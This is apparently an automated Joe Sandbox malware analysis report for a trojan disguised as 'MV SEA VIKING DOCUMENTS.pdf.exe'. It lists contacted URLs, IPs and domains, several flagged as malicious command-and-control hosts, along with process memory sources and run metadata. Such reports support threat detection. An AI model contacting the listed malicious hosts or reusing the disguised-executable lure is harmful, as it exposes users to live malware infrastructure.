                                                                                                            http://www.nagradi7.com/be4o/?h48Hl=kw7dGhb5eKkyCVvAuZmYTQsgnBkQwasXlJHrp3Yi63/vNGhbWFnPnmRrKjdxIJy9M/yz&7nx8=7nN0Wh-H7true
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.fairytalepageants.com/be4o/?h48Hl=i0+Fnnt4E2duUPt43OZuwY3vuaej64lfKZi0K7F4B5AoqOaU2cNQP6t/zkb03XoiZyP6&w6=ZbFDmLfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&w6=ZbFDmLfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            http://www.buresdx.com/be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0true
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown

                                                                                                            URLs from Memory and Binaries

                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                            https://powerpoint.office.comerexplorer.exe, 00000010.00000000.2466445411.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2707742528.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2577458976.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2518578539.000000000D574000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://doc-04-08-docs.googleusercontent.com/MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4809179643.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819975217.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819478244.0000000001A44000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4806866586.0000000001A99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://excel.office.comtexplorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://track.uc.cn/collectfirefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://drive.google.com/q-MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765294903.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2725523941.0000000001A53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.ooo-club.comchkdsk.exe, 00000015.00000002.7218671686.000000000613B000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304260697.0000000000626000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676661138.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.microexplorer.exe, 00000010.00000000.2497558929.0000000003500000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2462040165.000000000B060000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2571623791.000000000AB00000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.gopher.ftp://ftp.MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://api.msn.com/Eexplorer.exe, 00000010.00000000.2506307780.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2454676516.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2565245502.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2694288500.0000000009921000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2303676581.00000000005F2000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676216902.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.vaughnediting.com/be4o/?Olnhrn=ongdD4qXjjPP&h48Hl=o5nWsVahRRcZ5g7lskYZzD6T98nAnbLK/jyfa2chkdsk.exe, 00000015.00000002.7218059463.0000000005AC2000.00000004.10000000.00040000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://doc-04-08-docs.googleusercontent.com/2MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://drive.google.com/MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765294903.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2725523941.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4811980051.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4810200786.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819570976.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://outlook.com#explorer.exe, 00000010.00000000.2576182056.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2517426935.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2465323717.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2706242156.000000000D498000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://hm.baidu.com/hm.js?firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexeexplorer.exe, 00000010.00000000.2466445411.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2707742528.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2577458976.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2518578539.000000000D574000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://outlook.comeHost_explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		low
                                                                                                                                    https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v3j65rcqMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://wns.windows.com/explorer.exe, 00000010.00000000.2530505129.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2476388852.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2723471084.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2590547531.000000000F7E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://aka.ms/odirmBexplorer.exe, 00000010.00000000.2564854686.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2454229324.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505897529.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693885884.00000000098CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorMV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.foreca.comexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://api.msn.com/v1/news/Feed/Windows?5explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://api.msn.com:443/v1/news/Feed/Windows?Aexplorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://doc-04-08-docs.googleusercontent.com/F$gshmhprg0nvltzt.exe, 00000023.00000003.4809179643.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819975217.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4806866586.0000000001A99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://doc-04-08-docs.googleusercontent.com/xMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://excel.office.comKexplorer.exe, 00000010.00000000.2576182056.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2517426935.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2465323717.000000000D498000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2706242156.000000000D498000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://181ue.com/sq.html?entry=firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://word.office.comeweexplorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://android.notify.windows.com/iOS4explorer.exe, 00000010.00000000.2476687824.000000000F80D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2530734369.000000000F80E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2590759572.000000000F80E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://doc-04-08-docs.googleusercontent.com/yeMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000010.00000000.2590759572.000000000F80E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2303676581.00000000005F2000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676216902.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://api.msn.com/explorer.exe, 00000010.00000000.2506307780.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2454676516.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2565245502.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2694288500.0000000009921000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://doc-04-08-docs.googleusercontent.com/bAMV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2432523941.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766276229.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2724756121.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://windows.msn.com:443/shellexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGaexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://www.msn.com:443/en-us/feedexplorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://drive.google.com/#shmhprg0nvltzt.exe, 00000023.00000003.4811980051.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4810200786.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819570976.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://doc-04-08-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvob9bt0shmhprg0nvltzt.exe, 00000023.00000002.4819883772.0000000001A8E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820024360.0000000001AA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high

                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                    Public IPs

                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    154.23.172.38
                                                                                                                                                                                    		7bkj.comUnited States
                                                                                                                                                                                    		174COGENT-174UStrue
                                                                                                                                                                                    35.214.4.70
                                                                                                                                                                                    		www.ooo-club.comUnited States
                                                                                                                                                                                    		19527GOOGLE-2UStrue
                                                                                                                                                                                    35.244.144.199
                                                                                                                                                                                    		www.4huav946.comUnited States
                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                    79.110.48.188
                                                                                                                                                                                    		neonewway.clubGermany
                                                                                                                                                                                    		57287OTAVANET-ASCZtrue
                                                                                                                                                                                    64.32.22.102
                                                                                                                                                                                    		parking.namesilo.comUnited States
                                                                                                                                                                                    		46844ST-BGPUSfalse
                                                                                                                                                                                    91.184.31.217
                                                                                                                                                                                    		easypeasy.communityNetherlands
                                                                                                                                                                                    		197902HOSTNETNLtrue
                                                                                                                                                                                    23.227.38.74
                                                                                                                                                                                    		shops.myshopify.comCanada
                                                                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                                                                    217.160.0.98
                                                                                                                                                                                    		www.janhenningsen.comGermany
                                                                                                                                                                                    		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                    45.195.115.71
                                                                                                                                                                                    		www.rsxrsh.comSeychelles
                                                                                                                                                                                    		62468VPSQUANUStrue
                                                                                                                                                                                    93.184.220.29
                                                                                                                                                                                    		unknownEuropean Union
                                                                                                                                                                                    		15133EDGECASTUSfalse
                                                                                                                                                                                    154.214.67.115
                                                                                                                                                                                    		www.nagradi7.comSeychelles
                                                                                                                                                                                    		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                                                                                                                    66.29.154.157
                                                                                                                                                                                    		www.buresdx.comUnited States
                                                                                                                                                                                    		19538ADVANTAGECOMUStrue
                                                                                                                                                                                    38.143.0.82
                                                                                                                                                                                    		www.quanqiu55555.comUnited States
                                                                                                                                                                                    		134520GIGSGIGSCLOUD-AS-APGigsGigsNetworkServicesHKtrue
                                                                                                                                                                                    142.250.185.174
                                                                                                                                                                                    		drive.google.comUnited States
                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                    185.190.39.52
                                                                                                                                                                                    		www.dreamintelligent.comBulgaria
                                                                                                                                                                                    		31480SILVERCOMRU-ASRUtrue
                                                                                                                                                                                    142.250.185.161
                                                                                                                                                                                    		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                    148.251.15.228
                                                                                                                                                                                    		avid3814506.altervista.orgGermany
                                                                                                                                                                                    		24940HETZNER-ASDEfalse
                                                                                                                                                                                    34.102.136.180
                                                                                                                                                                                    		josiemaran-supernatural.comUnited States
                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                    213.190.6.63
                                                                                                                                                                                    		vendasdigitaisonline.comGermany
                                                                                                                                                                                    		47583AS-HOSTINGERLTtrue
                                                                                                                                                                                    54.154.44.39
                                                                                                                                                                                    		sslhosting.simplesite.comUnited States
                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                    142.250.186.51
                                                                                                                                                                                    		ghs.googlehosted.comUnited States
                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                    162.0.209.21
                                                                                                                                                                                    		itservon.comCanada
                                                                                                                                                                                    		35893ACPCAtrue
                                                                                                                                                                                    95.179.246.125
                                                                                                                                                                                    		waktuk.comNetherlands
                                                                                                                                                                                    		20473AS-CHOOPAUStrue

                                                                                                                                                                                    General Information

                                                                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                    Analysis ID:575819
                                                                                                                                                                                    Start date:21.02.2022
                                                                                                                                                                                    Start time:16:47:53
                                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 17m 40s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Sample file name:MV SEA VIKING DOCUMENTS.pdf.exe
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                    Run name:Suspected Instruction Hammering
                                                                                                                                                                                    Number of analysed new started processes analysed:41
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:2
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • HDC enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@20/9@62/23
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    HDC Information:Failed
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 99%
                                                                                                                                                                                    • Number of executed functions: 202
                                                                                                                                                                                    • Number of non-executed functions: 165
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Adjust boot time
                                                                                                                                                                                    • Enable AMSI
                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                    Warnings

                                                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, consent.exe, UserOOBEBroker.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MusNotificationUx.exe, audiodg.exe, BackgroundTransferHost.exe, ShellExperienceHost.exe, WMIADAP.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.82.19.171, 52.147.223.103
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, wd-prod-cp-us-east-2-fe.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, login.live.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
